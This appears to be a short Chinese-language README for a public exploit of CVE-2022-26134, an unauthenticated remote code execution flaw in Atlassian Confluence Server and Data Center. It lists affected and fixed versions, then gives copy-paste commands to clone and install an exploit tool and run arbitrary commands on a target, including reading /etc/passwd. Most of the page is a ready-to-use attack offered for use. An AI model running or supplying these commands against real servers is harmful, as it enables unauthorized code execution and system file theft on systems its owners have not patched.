
Atlassian Confluence (CVE-2022-26134) - Unauthenticated Remote code execution (RCE)
Confluence Server 和 Data Center - CVE-2022-26134 - 严重级别未经验证的远程代码执行漏洞
| 摘要 | CVE-2022-26134 - 严重级别未经验证的远程代码执行漏洞 影响 Confluence Server 和 Data Center |
|---|---|
| 受影响产品 | Confluence Confluence Server Confluence Data Center |
| 受影响版本 | 所有受支持的 Confluence Server 和 Data Center 版本均受影响。 1.3.0 之后的 Confluence Server 和 Data Center 版本受影响。 |
| 修复版本 | 7.4.17 7.13.7 7.14.3 7.15.2 7.16.4 7.17.4 7.18.1 |
在终端中复制粘贴:
git clone https://github.com/nxtexploit/CVE-2022-26134 ; cd CVE-2022-26134 ; pip install -r requirements.txt
python3 CVE-2022-26134.py https://target.com type-command-here
python3 CVE-2022-26134.py https://target.com "uname -a"
python3 CVE-2022-26134.py https://target.com "cat /etc/passwd"
python3 CVE-2022-26134.py https://target.com id
